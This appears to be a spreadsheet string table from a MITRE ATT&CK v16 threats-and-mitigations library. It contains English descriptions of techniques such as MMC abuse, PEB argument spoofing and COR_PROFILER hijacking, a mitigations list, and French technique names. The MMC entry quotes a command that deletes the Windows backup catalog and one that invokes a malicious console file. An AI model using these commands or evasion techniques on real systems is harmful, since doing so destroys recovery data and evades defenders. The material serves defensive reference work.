    <t>Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. &lt;code&gt;reload&lt;/code&gt;).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)
https://attack.mitre.org/techniques/T1529</t>
  </si>
  <si>
    <t>T1218.014</t>
  </si>
  <si>
    <t>MMC</t>
  </si>
  <si>
    <t>Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)
For example, &lt;code&gt;mmc C:\Users\foo\admintools.msc /a&lt;/code&gt; will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is &lt;code&gt;mmc gpedit.msc&lt;/code&gt;, which will open the Group Policy Editor application window. 
Adversaries may use MMC commands to perform malicious tasks. For example, &lt;code&gt;mmc wbadmin.msc delete catalog -quiet&lt;/code&gt; deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: &lt;code&gt;wbadmin.msc&lt;/code&gt; may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)
Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: &lt;code&gt;mmc.exe -Embedding C:\path\to\test.msc&lt;/code&gt;.(Citation: abusing_com_reg)
https://attack.mitre.org/techniques/T1218/014</t>
  </si>
  <si>
    <t>T1564.010</t>
  </si>
  <si>
    <t>Process Argument Spoofing</t>
  </si>
  <si>
    <t>Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
Adversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) &lt;code&gt;WriteProcessMemory()&lt;/code&gt; function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)
Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)
This behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.
https://attack.mitre.org/techniques/T1564/010</t>
  </si>
  <si>
    <t>T1574.012</t>
  </si>
  <si>
    <t>COR_PROFILER</t>
  </si>
  <si>
    <t>Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
https://attack.mitre.org/techniques/T1574/012</t>
  </si>
  <si>
    <t>reference_controls</t>
  </si>
  <si>
    <t>urn:intuitem:risk:function:mitre-attack</t>
  </si>
  <si>
    <t>csf_function</t>
  </si>
  <si>
    <t>category</t>
  </si>
  <si>
    <t>M1031</t>
  </si>
  <si>
    <t>Network Intrusion Prevention</t>
  </si>
  <si>
    <t>detect</t>
  </si>
  <si>
    <t>technical</t>
  </si>
  <si>
    <t>Use intrusion detection signatures to block traffic at network boundaries.
https://attack.mitre.org/mitigations/M1031</t>
  </si>
  <si>
    <t>M1016</t>
  </si>
  <si>
    <t>Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.
https://attack.mitre.org/mitigations/M1016</t>
  </si>
  <si>
    <t>M1035</t>
  </si>
  <si>
    <t>Limit Access to Resource Over Network</t>
  </si>
  <si>
    <t>protect</t>
  </si>
  <si>
    <t>Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
https://attack.mitre.org/mitigations/M1035</t>
  </si>
  <si>
    <t>M1029</t>
  </si>
  <si>
    <t>Remote Data Storage</t>
  </si>
  <si>
    <t>Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.
https://attack.mitre.org/mitigations/M1029</t>
  </si>
  <si>
    <t>M1037</t>
  </si>
  <si>
    <t>Filter Network Traffic</t>
  </si>
  <si>
    <t>Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
https://attack.mitre.org/mitigations/M1037</t>
  </si>
  <si>
    <t>M1021</t>
  </si>
  <si>
    <t>Restrict Web-Based Content</t>
  </si>
  <si>
    <t>Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
https://attack.mitre.org/mitigations/M1021</t>
  </si>
  <si>
    <t>M1033</t>
  </si>
  <si>
    <t>Limit Software Installation</t>
  </si>
  <si>
    <t>Block users or groups from installing unapproved software.
https://attack.mitre.org/mitigations/M1033</t>
  </si>
  <si>
    <t>M1013</t>
  </si>
  <si>
    <t>Application Developer Guidance</t>
  </si>
  <si>
    <t>govern</t>
  </si>
  <si>
    <t>This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.
https://attack.mitre.org/mitigations/M1013</t>
  </si>
  <si>
    <t>M1034</t>
  </si>
  <si>
    <t>Limit Hardware Installation</t>
  </si>
  <si>
    <t>Block users or groups from installing or using unapproved hardware on systems, including USB devices.
https://attack.mitre.org/mitigations/M1034</t>
  </si>
  <si>
    <t>M1017</t>
  </si>
  <si>
    <t>User Training</t>
  </si>
  <si>
    <t>Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
https://attack.mitre.org/mitigations/M1017</t>
  </si>
  <si>
    <t>M1052</t>
  </si>
  <si>
    <t>User Account Control</t>
  </si>
  <si>
    <t>Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.
https://attack.mitre.org/mitigations/M1052</t>
  </si>
  <si>
    <t>M1028</t>
  </si>
  <si>
    <t>Operating System Configuration</t>
  </si>
  <si>
    <t>Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
https://attack.mitre.org/mitigations/M1028</t>
  </si>
  <si>
    <t>M1053</t>
  </si>
  <si>
    <t>Data Backup</t>
  </si>
  <si>
    <t>recover</t>
  </si>
  <si>
    <t>Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.
https://attack.mitre.org/mitigations/M1053</t>
  </si>
  <si>
    <t>M1038</t>
  </si>
  <si>
    <t>Execution Prevention</t>
  </si>
  <si>
    <t>Block execution of code on a system through application control, and/or script blocking.
https://attack.mitre.org/mitigations/M1038</t>
  </si>
  <si>
    <t>M1043</t>
  </si>
  <si>
    <t>Credential Access Protection</t>
  </si>
  <si>
    <t>Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.
https://attack.mitre.org/mitigations/M1043</t>
  </si>
  <si>
    <t>M1045</t>
  </si>
  <si>
    <t>Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
https://attack.mitre.org/mitigations/M1045</t>
  </si>
  <si>
    <t>M1039</t>
  </si>
  <si>
    <t>Environment Variable Permissions</t>
  </si>
  <si>
    <t>Prevent modification of environment variables by unauthorized users and groups.
https://attack.mitre.org/mitigations/M1039</t>
  </si>
  <si>
    <t>M1057</t>
  </si>
  <si>
    <t>Data Loss Prevention</t>
  </si>
  <si>
    <t>Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)
https://attack.mitre.org/mitigations/M1057</t>
  </si>
  <si>
    <t>M1025</t>
  </si>
  <si>
    <t>Privileged Process Integrity</t>
  </si>
  <si>
    <t>Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.
https://attack.mitre.org/mitigations/M1025</t>
  </si>
  <si>
    <t>M1055</t>
  </si>
  <si>
    <t>Do Not Mitigate</t>
  </si>
  <si>
    <t>This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.
https://attack.mitre.org/mitigations/M1055</t>
  </si>
  <si>
    <t>M1056</t>
  </si>
  <si>
    <t>Pre-compromise</t>
  </si>
  <si>
    <t>This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.
https://attack.mitre.org/mitigations/M1056</t>
  </si>
  <si>
    <t>M1020</t>
  </si>
  <si>
    <t>SSL/TLS Inspection</t>
  </si>
  <si>
    <t>Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.
https://attack.mitre.org/mitigations/M1020</t>
  </si>
  <si>
    <t>M1046</t>
  </si>
  <si>
    <t>Boot Integrity</t>
  </si>
  <si>
    <t>Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.
https://attack.mitre.org/mitigations/M1046</t>
  </si>
  <si>
    <t>M1060</t>
  </si>
  <si>
    <t>Out-of-Band Communications Channel</t>
  </si>
  <si>
    <t>Establish secure out-of-band communication channels to ensure the continuity of critical communications during security incidents, data integrity attacks, or in-network communication failures. Out-of-band communication refers to using an alternative, separate communication path that is not dependent on the potentially compromised primary network infrastructure. This method can include secure messaging apps, encrypted phone lines, satellite communications, or dedicated emergency communication systems. Leveraging these alternative channels reduces the risk of adversaries intercepting, disrupting, or tampering with sensitive communications and helps coordinate an effective incident response.(Citation: TrustedSec OOB Communications)(Citation: NIST Special Publication 800-53 Revision 5)
https://attack.mitre.org/mitigations/M1060</t>
  </si>
  <si>
    <t>M1030</t>
  </si>
  <si>
    <t>Network Segmentation</t>
  </si>
  <si>
    <t>Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.
https://attack.mitre.org/mitigations/M1030</t>
  </si>
  <si>
    <t>M1019</t>
  </si>
  <si>
    <t>Threat Intelligence Program</t>
  </si>
  <si>
    <t>A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.
https://attack.mitre.org/mitigations/M1019</t>
  </si>
  <si>
    <t>M1027</t>
  </si>
  <si>
    <t>Password Policies</t>
  </si>
  <si>
    <t>Set and enforce secure password policies for accounts.
https://attack.mitre.org/mitigations/M1027</t>
  </si>
  <si>
    <t>M1040</t>
  </si>
  <si>
    <t>Behavior Prevention on Endpoint</t>
  </si>
  <si>
    <t>Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
https://attack.mitre.org/mitigations/M1040</t>
  </si>
  <si>
    <t>M1018</t>
  </si>
  <si>
    <t>User Account Management</t>
  </si>
  <si>
    <t>Manage the creation, modification, use, and permissions associated to user accounts.
https://attack.mitre.org/mitigations/M1018</t>
  </si>
  <si>
    <t>M1022</t>
  </si>
  <si>
    <t>Restrict File and Directory Permissions</t>
  </si>
  <si>
    <t>Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
https://attack.mitre.org/mitigations/M1022</t>
  </si>
  <si>
    <t>M1026</t>
  </si>
  <si>
    <t>Privileged Account Management</t>
  </si>
  <si>
    <t>Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
https://attack.mitre.org/mitigations/M1026</t>
  </si>
  <si>
    <t>M1024</t>
  </si>
  <si>
    <t>Restrict Registry Permissions</t>
  </si>
  <si>
    <t>Restrict the ability to modify certain hives or keys in the Windows Registry.
https://attack.mitre.org/mitigations/M1024</t>
  </si>
  <si>
    <t>M1049</t>
  </si>
  <si>
    <t>Antivirus/Antimalware</t>
  </si>
  <si>
    <t>Use signatures or heuristics to detect malicious software.
https://attack.mitre.org/mitigations/M1049</t>
  </si>
  <si>
    <t>M1032</t>
  </si>
  <si>
    <t>Multi-factor Authentication</t>
  </si>
  <si>
    <t>Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
https://attack.mitre.org/mitigations/M1032</t>
  </si>
  <si>
    <t>M1054</t>
  </si>
  <si>
    <t>Software Configuration</t>
  </si>
  <si>
    <t>Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
https://attack.mitre.org/mitigations/M1054</t>
  </si>
  <si>
    <t>M1048</t>
  </si>
  <si>
    <t>Application Isolation and Sandboxing</t>
  </si>
  <si>
    <t>Restrict execution of code to a virtual environment on or in transit to an endpoint system.
https://attack.mitre.org/mitigations/M1048</t>
  </si>
  <si>
    <t>M1047</t>
  </si>
  <si>
    <t>Audit</t>
  </si>
  <si>
    <t>Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
https://attack.mitre.org/mitigations/M1047</t>
  </si>
  <si>
    <t>M1050</t>
  </si>
  <si>
    <t>Exploit Protection</t>
  </si>
  <si>
    <t>Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.
https://attack.mitre.org/mitigations/M1050</t>
  </si>
  <si>
    <t>M1015</t>
  </si>
  <si>
    <t>Active Directory Configuration</t>
  </si>
  <si>
    <t>Implement robust Active Directory configurations using group policies to control access and reduce the attack surface. Specific examples include:
* Account Configuration: Use provisioned domain accounts rather than local accounts to leverage centralized control and auditing capabilities.
* Interactive Logon Restrictions: Enforce group policies that prohibit interactive logons for accounts that should not directly access systems.
* Remote Desktop Settings: Limit Remote Desktop logons to authorized accounts to prevent misuse by adversaries.
* Dedicated Administrative Accounts: Create specialized domain-wide accounts that are restricted from interactive logons but can perform specific tasks like installations or repository access.
* Authentication Silos: Configure Authentication Silos in Active Directory to create access zones with restrictions based on membership in the Protected Users global security group. This setup enhances security by applying additional protections to high-risk accounts, limiting their exposure to potential attacks.
https://attack.mitre.org/mitigations/M1015</t>
  </si>
  <si>
    <t>M1051</t>
  </si>
  <si>
    <t>Update Software</t>
  </si>
  <si>
    <t>Perform regular software updates to mitigate exploitation risk.
https://attack.mitre.org/mitigations/M1051</t>
  </si>
  <si>
    <t>M1044</t>
  </si>
  <si>
    <t>Restrict Library Loading</t>
  </si>
  <si>
    <t>Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.
https://attack.mitre.org/mitigations/M1044</t>
  </si>
  <si>
    <t>M1042</t>
  </si>
  <si>
    <t>Disable or Remove Feature or Program</t>
  </si>
  <si>
    <t>Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
https://attack.mitre.org/mitigations/M1042</t>
  </si>
  <si>
    <t>M1036</t>
  </si>
  <si>
    <t>Account Use Policies</t>
  </si>
  <si>
    <t>Configure features related to account use like login attempt lockouts, specific login times, etc.
https://attack.mitre.org/mitigations/M1036</t>
  </si>
  <si>
    <t>M1041</t>
  </si>
  <si>
    <t>Encrypt Sensitive Information</t>
  </si>
  <si>
    <t>Protect sensitive information with strong encryption.
https://attack.mitre.org/mitigations/M1041</t>
  </si>
  <si>
    <t>name[fr]</t>
  </si>
  <si>
    <t>description[fr]</t>
  </si>
  <si>
    <t>copyright[fr]</t>
  </si>
  <si>
    <t>Mitre ATT&amp;CK v16 - Menaces et mesures d’atténuation</t>
  </si>
  <si>
    <t>Conditions d’utilisation
LICENCE
MITRE Corporation (MITRE) vous accorde par la présente une licence non exclusive et libre de droits pour utiliser ATT&amp;CK® à des fins de recherche, de développement et commerciales. Toute copie que vous faites à ces fins est autorisée à condition que vous reproduisiez la désignation de droit d’auteur de MITRE et la présente licence dans une telle copie.
" © 2022 La société MITRE. Cette œuvre est reproduite et distribuée avec la permission de The MITRE Corporation.
AVERTISSEMENTS
MITRE ne prétend pas qu’ATT&amp;CK énumère toutes les possibilités pour les types d’actions et de comportements documentés dans le cadre de son modèle d’adversaire et de son cadre de techniques. L’utilisation des informations contenues dans ATT&amp;CK pour aborder ou couvrir des catégories complètes de techniques ne garantira pas une couverture défensive complète, car il peut y avoir des techniques non divulguées ou des variations de techniques existantes non documentées par ATT&amp;CK.
TOUS LES DOCUMENTS ET LES INFORMATIONS QU’ILS CONTIENNENT SONT FOURNIS « EN L’ÉTAT » ET LE CONTRIBUTEUR, L’ORGANISATION QU’IL REPRÉSENTE OU QUI EST PARRAINÉE PAR (LE CAS ÉCHÉANT), LA MITRE CORPORATION, SON CONSEIL D’ADMINISTRATION, SES DIRIGEANTS, SES AGENTS ET SES EMPLOYÉS, DÉCLINENT TOUTE GARANTIE, EXPRESSE OU IMPLICITE, Y COMPRIS, MAIS SANS S’Y LIMITER, TOUTE GARANTIE QUE L’UTILISATION DES INFORMATIONS QU’ILS CONTIENNENT N’ENFREINDRA AUCUN DROIT OU TOUTE GARANTIE IMPLICITE DE QUALITÉ MARCHANDE OU D’ADÉQUATION À UN PARTICULIER BUT.</t>
  </si>
  <si>
    <t>Injection supplémentaire de mémoire de fenêtre</t>
  </si>
  <si>
    <t>Tâche planifiée</t>
  </si>
  <si>
    <t>Archiver via l’utilitaire</t>
  </si>
  <si>
    <t>Instrumentation de gestion Windows</t>
  </si>
  <si>
    <t>Capture d’écran</t>
  </si>
  <si>
    <t>Stockage sans fichier</t>
  </si>
  <si>
    <t>Scripts d’initialisation de démarrage ou de connexion</t>
  </si>
  <si>
    <t>Adversaire au milieu</t>
  </si>
  <si>
    <t>Découverte du propriétaire du système/de l’utilisateur</t>
  </si>
  <si>
    <t>Acquérir des infrastructures</t>
  </si>
  <si>
    <t>Découverte de conteneurs et de ressources</t>
  </si>
  <si>
    <t>Sans serveur</t>
  </si>
  <si>
    <t>Encodage standard</t>
  </si>
  <si>
    <t>Charges utiles intégrées</t>
  </si>
  <si>
    <t>Modules d’authentification enfichables</t>
  </si>
  <si>
    <t>Rétablir l’instance Cloud</t>
  </si>
  <si>
    <t>Recueillir les informations sur l’hôte de la victime</t>
  </si>
  <si>
    <t>Certificats numériques</t>
  </si>
  <si>
    <t>Enregistrement de frappe</t>
  </si>
  <si>
    <t>Exclusions de fichiers/chemins d’accès</t>
  </si>
  <si>
    <t>Modification des autorisations de fichiers et de répertoires Linux et Mac</t>
  </si>
  <si>
    <t>Devinage du mot de passe</t>
  </si>
  <si>
    <t>Données techniques d’achat</t>
  </si>
  <si>
    <t>Vidage des informations d’identification du système d’exploitation</t>
  </si>
  <si>
    <t>Modules partagés</t>
  </si>
  <si>
    <t>Données du référentiel de configuration</t>
  </si>
  <si>
    <t>Effacement de la structure du disque</t>
  </si>
  <si>
    <t>Inondation directe du réseau</t>
  </si>
  <si>
    <t>Interception de chemin par la variable d’environnement PATH</t>
  </si>
  <si>
    <t>Accès direct aux volumes</t>
  </si>
  <si>
    <t>Intelligence artificielle</t>
  </si>
  <si>
    <t>Modifier la hiérarchie des ressources cloud</t>
  </si>
  <si>
    <t>Règles de masquage des e-mails</t>
  </si>
  <si>
    <t>Défiguration externe</t>
  </si>
  <si>
    <t>Fichier crypté/encodé</t>
  </si>
  <si>
    <t>Adresses IP</t>
  </si>
  <si>
    <t>Inondation d’épuisement du système d’exploitation</t>
  </si>
  <si>
    <t>Profil PowerShell</t>
  </si>
  <si>
    <t>Javascript</t>
  </si>
  <si>
    <t>Suppression déclenchée par le cycle de vie</t>
  </si>
  <si>
    <t>Création ou modification d’un processus système</t>
  </si>
  <si>
    <t>Services à distance externes</t>
  </si>
  <si>
    <t>Voler un cookie de session Web</t>
  </si>
  <si>
    <t>Travail d’orchestration de conteneur</t>
  </si>
  <si>
    <t>Algorithmes de génération de domaine</t>
  </si>
  <si>
    <t>Double extension de fichier</t>
  </si>
  <si>
    <t>Contourner le contrôle de compte d’utilisateur</t>
  </si>
  <si>
    <t>Pompage SMS</t>
  </si>
  <si>
    <t>Découverte de la connexion Internet</t>
  </si>
  <si>
    <t>Sudo et mise en cache Sudo</t>
  </si>
  <si>
    <t>Archivage via une méthode personnalisée</t>
  </si>
  <si>
    <t>Modifier l’infrastructure de calcul dans le cloud</t>
  </si>
  <si>
    <t>Périphériques réseau</t>
  </si>
  <si>
    <t>Publicité malveillante</t>
  </si>
  <si>
    <t>Découverte des groupes d’autorisations</t>
  </si>
  <si>
    <t>Collecte d’e-mails</t>
  </si>
  <si>
    <t>Gestionnaire de comptes de sécurité</t>
  </si>
  <si>
    <t>Micrologiciel du système</t>
  </si>
  <si>
    <t>Rechercher des sites Web appartenant à des victimes</t>
  </si>
  <si>
    <t>Groupes de cloud</t>
  </si>
  <si>
    <t>Faiblesse des autorisations de registre des services</t>
  </si>
  <si>
    <t>DNS/DNS passif</t>
  </si>
  <si>
    <t>Application Épuisement Inondation</t>
  </si>
  <si>
    <t>Compromettre les dépendances logicielles et les outils de développement</t>
  </si>
  <si>
    <t>Serveur DNS</t>
  </si>
  <si>
    <t>Effacement du disque</t>
  </si>
  <si>
    <t>API de métadonnées d’instance cloud</t>
  </si>
  <si>
    <t>Mémoire sécurisée</t>
  </si>
  <si>
    <t>Découverte de la stratégie de groupe</t>
  </si>
  <si>
    <t>Kit d’amorçage</t>
  </si>
  <si>
    <t>Données à partir d’un support amovible</t>
  </si>
  <si>
    <t>Transfert des données locales</t>
  </si>
  <si>
    <t>Correspondance du nom ou de l’emplacement légitime</t>
  </si>
  <si>
    <t>Manipulation des données stockées</t>
  </si>
  <si>
    <t>Craquage de mot de passe</t>
  </si>
  <si>
    <t>Collecte d’e-mails locaux</t>
  </si>
  <si>
    <t>Porte-clés</t>
  </si>
  <si>
    <t>Démarrage automatique de démarrage ou d’ouverture de session</t>
  </si>
  <si>
    <t>Affaiblir le chiffrement</t>
  </si>
  <si>
    <t>Jetons SAML</t>
  </si>
  <si>
    <t>Type de fichier Masquerade</t>
  </si>
  <si>
    <t>Arrêt du service</t>
  </si>
  <si>
    <t>Découverte du pilote de périphérique</t>
  </si>
  <si>
    <t>Compte de domaine</t>
  </si>
  <si>
    <t>Configuration active</t>
  </si>
  <si>
    <t>Masquer les artefacts</t>
  </si>
  <si>
    <t>Échange de données dynamique</t>
  </si>
  <si>
    <t>Fichier malveillant</t>
  </si>
  <si>
    <t>Identifier le tempo de l’entreprise</t>
  </si>
  <si>
    <t>Protocoles de publication/abonnement</t>
  </si>
  <si>
    <t>Matériel</t>
  </si>
  <si>
    <t>Entacher le contenu partagé</t>
  </si>
  <si>
    <t>Modification de la fiducie</t>
  </si>
  <si>
    <t>Cryptographie symétrique</t>
  </si>
  <si>
    <t>Compte local</t>
  </si>
  <si>
    <t>Comptes de médias sociaux</t>
  </si>
  <si>
    <t>Démarrage en mode sans échec</t>
  </si>
  <si>
    <t>Démarrage TFTP</t>
  </si>
  <si>
    <t>DNS à flux rapide</t>
  </si>
  <si>
    <t>Vérifications du système</t>
  </si>
  <si>
    <t>Groupes de domaines</t>
  </si>
  <si>
    <t>Vulnérabilités</t>
  </si>
  <si>
    <t>Lien vers le spearphishing</t>
  </si>
  <si>
    <t>Effacer les journaux système Linux ou Mac</t>
  </si>
  <si>
    <t>Exploitation d’une application ou d’un système</t>
  </si>
  <si>
    <t>Démarrage de l’application Office</t>
  </si>
  <si>
    <t>Rôles Cloud supplémentaires</t>
  </si>
  <si>
    <t>Processeurs d’impression</t>
  </si>
  <si>
    <t>Accessoire de spearphishing</t>
  </si>
  <si>
    <t>Charges utiles dépouillées</t>
  </si>
  <si>
    <t>Modèle objet composant</t>
  </si>
  <si>
    <t>Détournement d’ordre de recherche DLL</t>
  </si>
  <si>
    <t>Collecte automatisée</t>
  </si>
  <si>
    <t>Données du presse-papiers</t>
  </si>
  <si>
    <t>Système de fichiers Proc</t>
  </si>
  <si>
    <t>Gestionnaires de mots de passe</t>
  </si>
  <si>
    <t>Contournement de Gatekeeper</t>
  </si>
  <si>
    <t>Cible intempestive</t>
  </si>
  <si>
    <t>Découverte du service système</t>
  </si>
  <si>
    <t>Reniflage du réseau</t>
  </si>
  <si>
    <t>Signature de code</t>
  </si>
  <si>
    <t>Données du stockage dans le cloud</t>
  </si>
  <si>
    <t>Manipulation des données d’exécution</t>
  </si>
  <si>
    <t>Informations d’identification dans le registre</t>
  </si>
  <si>
    <t>Découverte du partage du réseau</t>
  </si>
  <si>
    <t>Découverte des périphériques</t>
  </si>
  <si>
    <t>Briser les arbres de processus</t>
  </si>
  <si>
    <t>Topologie de réseau</t>
  </si>
  <si>
    <t>Certificats de signature de code</t>
  </si>
  <si>
    <t>Modification des autorisations de fichiers et de répertoires Windows</t>
  </si>
  <si>
    <t>Compléments</t>
  </si>
  <si>
    <t>Découverte des informations système</t>
  </si>
  <si>
    <t>Protocole de la couche application</t>
  </si>
  <si>
    <t>Transfert de données à distance</t>
  </si>
  <si>
    <t>Rôles supplémentaires dans les clusters de conteneurs</t>
  </si>
  <si>
    <t>Tâche/travail planifié</t>
  </si>
  <si>
    <t>Dépendances d’approbation du réseau</t>
  </si>
  <si>
    <t>Amplification de la réflexion</t>
  </si>
  <si>
    <t>DLL de filtre de mot de passe</t>
  </si>
  <si>
    <t>Extensions de navigateur</t>
  </si>
  <si>
    <t>Inondation d’épuisement du service</t>
  </si>
  <si>
    <t>Compromettre la chaîne d’approvisionnement matérielle</t>
  </si>
  <si>
    <t>Fichiers Ccache</t>
  </si>
  <si>
    <t>Effacer l’historique et les configurations des connexions réseau</t>
  </si>
  <si>
    <t>Torréfaction AS-REP</t>
  </si>
  <si>
    <t>Serveur Privé Virtuel</t>
  </si>
  <si>
    <t>AutoHotKey et AutoIT</t>
  </si>
  <si>
    <t>Réduire l’espace clé</t>
  </si>
  <si>
    <t>Effacer l’historique des commandes</t>
  </si>
  <si>
    <t>Exécution indirecte de commandes</t>
  </si>
  <si>
    <t>Réplication via un support amovible</t>
  </si>
  <si>
    <t>Données du système local</t>
  </si>
  <si>
    <t>Débrouiller/décoder des fichiers ou des informations</t>
  </si>
  <si>
    <t>Règles Outlook</t>
  </si>
  <si>
    <t>Affaiblir les défenses</t>
  </si>
  <si>
    <t>Comptes cloud</t>
  </si>
  <si>
    <t>Comptes de messagerie</t>
  </si>
  <si>
    <t>Groupes locaux ou de domaines supplémentaires</t>
  </si>
  <si>
    <t>Télécharger un logiciel malveillant</t>
  </si>
  <si>
    <t>Compromission de la chaîne d’approvisionnement</t>
  </si>
  <si>
    <t>Exploiter une application publique</t>
  </si>
  <si>
    <t>Voler ou falsifier des billets Kerberos</t>
  </si>
  <si>
    <t>Informations d’identification à partir des magasins de mots de passe</t>
  </si>
  <si>
    <t>Exfiltration sur le service Web</t>
  </si>
  <si>
    <t>Logiciel d’accès à distance</t>
  </si>
  <si>
    <t>Domaines</t>
  </si>
  <si>
    <t>Archive via la bibliothèque</t>
  </si>
  <si>
    <t>Détournement d’exécution de thread</t>
  </si>
  <si>
    <t>Application : Flottage</t>
  </si>
  <si>
    <t>Identifiants non sécurisés</t>
  </si>
  <si>
    <t>Moniteurs de port</t>
  </si>
  <si>
    <t>Effacer les données de la boîte aux lettres</t>
  </si>
  <si>
    <t>Crochet de connexion</t>
  </si>
  <si>
    <t>Injection de contenu</t>
  </si>
  <si>
    <t>Injection de procédé</t>
  </si>
  <si>
    <t>Exfiltration sur Webhook</t>
  </si>
  <si>
    <t>Signalisation routière</t>
  </si>
  <si>
